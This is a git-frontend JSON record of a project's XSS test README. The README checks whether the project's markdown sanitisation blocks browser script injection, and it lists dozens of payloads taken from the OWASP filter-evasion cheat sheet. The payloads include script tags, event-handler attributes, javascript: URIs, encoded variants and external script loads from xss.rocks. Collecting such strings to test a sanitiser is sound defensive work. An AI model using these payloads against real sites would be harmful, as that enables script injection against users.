{"schema":"libjg2-1", "vpath":"/git/", "avatar":"/git/avatar/", "alang":"", "gen_ut":1713976633, "reponame":"gitohashi", "desc":"Git web frontend with clientside rendering", "owner": { "name": "Andy Green", "email": "andy@warmcat.com", "md5": "c50933ca2aa61e0fe2c43d46bb6b59cb" },"url":"https://warmcat.com/repo/gitohashi", "f":3, "items": [ { "schema":"libjg2-1", "oid":{ "oid": "9961e6fef5f0f2458efc1c2a40d63f7cc50ebfce", "alias": [ "refs/heads/main","refs/heads/master"]},"tree": [ { "name": "README.md","mode": "33188", "size":8086}, { "name": "xss.c","mode": "33188", "size":7179}],"s":{"c":1713569570,"u": 315}} ,{"schema":"libjg2-1", "cid":"8c08ac510382a1f7dc9cc121fdb3d950", "oid":{ "oid": "9961e6fef5f0f2458efc1c2a40d63f7cc50ebfce", "alias": [ "refs/heads/main","refs/heads/master"]},"blobname": "xss/README.md", "blob": "## XSS testing\n\nThe pages in this dir try to smuggle script execution into the stuff\nrendered in your browser in various ways.\n\nUnfortunately there are a LOT of ways modern browsers will let you do\nthat. Here we try a bunch of them and see if we are successful in\ndefeating them with our preprocessing. The attack methods came from\n\nhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet\n\nThis page is checking showdown rendering.\n\nAny successful script executions pop up an alert box. 
Seeing some strange\nrenderings just talking about scripts on this page and no popups counts as\na success...\n\n\u003cscript\u003ealert(\u0022xss/README.md: trivial script\u0022);\u003c/script\u003e\nhttps://something.com\nhttps://something.com' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com#' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com#\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com?x\u003d' onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)'\nhttps://something.com?x\u003d\u0022 onmouseover\u003d\u0022alert('xss/README.md: onmouseover in anonymous link')\u0022\nhttps://something.com\u0026quot; onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\nhttps://something.com\u0026#34 onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\nhttps://something.com\u0026amp;#34 onmouseover\u003d'alert(\u0022xss/README.md: onmouseover in anonymous link\u0022)\u0026quot;\n\n\n\nx \u003ca name\u003d\u0022n\u0022\nhref\u003d\u0022javascript:alert('xss/README.md: js in a href')\u0022\u003eclick me\u003c/a\u003e\n\n## \u003cscript\u003ealert(\u0022xss/README.md: trivial script in header\u0022);\u003c/script\u003e\n## javascript:alert('xss/README.md: js: in header')\n\njavascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d'+/\u0022/+/onmouseover\u003d1/+/[*/[]/+alert(1)//'\u003e\n\u003cIMG SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003djavascript:alert('XSS')\u003e\n\u003cIMG SRC\u003dJaVaScRiPt:alert('XSS')\u003e\n\u003cIMG 
SRC\u003djavascript:alert(\u0026quot;XSS\u0026quot;)\u003e\n\u003cIMG SRC\u003d`javascript:alert(\u0022RSnake says, 'XSS'\u0022)`\u003e\n\u003cIMG \u0022\u0022\u0022\u003e\u003cSCRIPT\u003ealert(\u0022XSS\u0022)\u003c/SCRIPT\u003e\u0022\u003e\n\u003cIMG SRC\u003djavascript:alert(String.fromCharCode(88,83,83))\u003e\n\u003cIMG SRC\u003d# onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG SRC\u003d onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG onmouseover\u003d\u0022alert('xxs')\u0022\u003e\n\u003cIMG SRC\u003d/ onerror\u003d\u0022alert(String.fromCharCode(88,83,83))\u0022\u003e\u003c/img\u003e\n\u003cimg src\u003dx onerror\u003d\u0022\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u0022\u003e\n\u003cIMG SRC\u003d\u0026#106;\u0026#97;\u0026#118;\u0026#97;\u0026#115;\u0026#99;\u0026#114;\u0026#105;\u0026#112;\u0026#116;\u0026#58;\u0026#97;\u0026#108;\u0026#101;\u0026#114;\u0026#116;\u0026#40;\n\u0026#39;\u0026#88;\u0026#83;\u0026#83;\u0026#39;\u0026#41;\u003e\n\u003cIMG SRC\u003d\u0026#0000106\u0026#0000097\u0026#0000118\u0026#0000097\u0026#0000115\u0026#0000099\u0026#0000114\u0026#0000105\u0026#0000112\u0026#0000116\u0026#0000058\u0026#0000097\u0026\n#0000108\u0026#0000101\u0026#0000114\u0026#0000116\u0026#0000040\u0026#0000039\u0026#0000088\u0026#0000083\u0026#0000083\u0026#0000039\u0026#0000041\u003e\n\u003cIMG SRC\u003d\u0026#x6A\u0026#x61\u0026#x76\u0026#x61\u0026#x73\u0026#x63\u0026#x72\u0026#x69\u0026#x70\u0026#x74\u0026#x3A\u0026#x61\u0026#x6C\u0026#x65\u0026#x72\u0026#x74\u0026#x28\u0026#x27\u0026#x58\u0026#x53\u0026#x53\u0026#x27\u0026#x29\u003e\n\u003cIMG SRC\u003d\u0022jav\tascript:alert('XSS');\u0022\u003e\n\u003cIMG 
SRC\u003d\u0022jav\u0026#x09;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022jav\u0026#x0A;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022jav\u0026#x0D;ascript:alert('XSS');\u0022\u003e\n\u003cIMG SRC\u003d\u0022 \u0026#14; javascript:alert('XSS');\u0022\u003e\n\u003cSCRIPT/XSS SRC\u003d\u0022http://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003cBODY onload!#$%\u0026()*~+-_.,:;?@[/|\u005c]^`\u003dalert(\u0022XSS\u0022)\u003e\n\u003cSCRIPT/SRC\u003d\u0022http://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003c\u003cSCRIPT\u003ealert(\u0022XSS\u0022);//\u003c\u003c/SCRIPT\u003e\n\u003cSCRIPT SRC\u003dhttp://xss.rocks/xss.js?\u003c B \u003e\n\u003cSCRIPT SRC\u003d//xss.rocks/.j\u003e\n\u003cIMG SRC\u003d\u0022javascript:alert('XSS')\u0022\n\u003ciframe src\u003dhttp://xss.rocks/scriptlet.html \u003c\n\u005c\u0022;alert('XSS');//\n\u003c/script\u003e\u003cscript\u003ealert('XSS');\u003c/script\u003e\n\u003cINPUT TYPE\u003d\u0022IMAGE\u0022 SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cBODY BACKGROUND\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cIMG DYNSRC\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cIMG LOWSRC\u003d\u0022javascript:alert('XSS')\u0022\u003e\n\u003cSTYLE\u003eli {list-style-image: url(\u0022javascript:alert('XSS')\u0022);}\u003c/STYLE\u003e\u003cUL\u003e\u003cLI\u003eXSS\u003c/br\u003e\n\u003cIMG SRC\u003d'vbscript:msgbox(\u0022XSS\u0022)'\u003e\n\u003csvg/onload\u003dalert('XSS')\u003e\nSet.constructor`alert\u005cx28document.domain\u005cx29```\n\n\u003cBODY ONLOAD\u003dalert('XSS')\u003e\n\n\u003cBGSOUND SRC\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cBR SIZE\u003d\u0022\u0026{alert('XSS')}\u0022\u003e\n\u003cLINK REL\u003d\u0022stylesheet\u0022 HREF\u003d\u0022javascript:alert('XSS');\u0022\u003e\n\u003cIMG STYLE\u003d\u0022xss:expr/*XSS*/ession(alert('XSS'))\u0022\u003e\n\u003cXSS 
STYLE\u003d\u0022xss:expression(alert('XSS'))\u0022\u003e\n\n¼script¾alert(¢XSS¢)¼/script¾\n\n\u003cMETA HTTP-EQUIV\u003d\u0022refresh\u0022 CONTENT\u003d\u00220;url\u003djavascript:alert('XSS');\u0022\u003e\n\n\u003cMETA HTTP-EQUIV\u003d\u0022refresh\u0022 CONTENT\u003d\u00220;url\u003ddata:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\u0022\u003e\n\u003c!--[if gte IE 4]\u003e\n \u003cSCRIPT\u003ealert('XSS');\u003c/SCRIPT\u003e\n \u003c![endif]--\u003e\n\n \u003cOBJECT TYPE\u003d\u0022text/x-scriptlet\u0022 DATA\u003d\u0022http://xss.rocks/scriptlet.html\u0022\u003e\u003c/OBJECT\u003e\n\n\u003cEMBED SRC\u003d\u0022data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg\u003d\u003d\u0022 type\u003d\u0022image/svg+xml\u0022 AllowScriptAccess\u003d\u0022always\u0022\u003e\u003c/EMBED\u003e\n\n\n\u003cHTML\u003e\u003cBODY\u003e\n\u003c?xml:namespace prefix\u003d\u0022t\u0022 ns\u003d\u0022urn:schemas-microsoft-com:time\u0022\u003e\n\u003c?import namespace\u003d\u0022t\u0022 implementation\u003d\u0022#default#time2\u0022\u003e\n\u003ct:set attributeName\u003d\u0022innerHTML\u0022 to\u003d\u0022XSS\u003cSCRIPT DEFER\u003ealert(\u0022XSS\u0022)\u003c/SCRIPT\u003e\u0022\u003e\n\u003c/BODY\u003e\u003c/HTML\u003e\n\n \u003cHEAD\u003e\u003cMETA HTTP-EQUIV\u003d\u0022CONTENT-TYPE\u0022 CONTENT\u003d\u0022text/html; charset\u003dUTF-7\u0022\u003e \u003c/HEAD\u003e+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-\n\n\u003cSCRIPT a\u003d\u0022\u003e\u0022 
SRC\u003d\u0022httx://xss.rocks/xss.js\u0022\u003e\u003c/SCRIPT\u003e\n\u003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n%3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026ltscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026lt;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026LTscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026LT;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#60script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#00060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#000060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0000060script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#60;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#00060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#000060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#0000060;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003c;script\u003ealert(\u0022xss\u0022)
;\u003c/script\u003e\n\u0026#x000003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003c;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x3C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x03C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x0003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x00003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#x000003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003Cscript\u003ealert(\u0022xss\u0022);\
u003c/script\u003e\n\u0026#X00003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X3C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X03C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X0003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X00003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u0026#X000003C;script\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cx3cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cx3Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cu003cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\u005cu003Cscript\u003ealert(\u0022xss\u0022);\u003c/script\u003e\n\n","s":{"c":1713569570,"u": 223}} ],"g": 8791,"chitpc": 0,"ehitpc": 0,"indexed":0 , "ab": 0, "si": 0, "db":0, "di":0, "sat":0, "lfc": "7d0a"}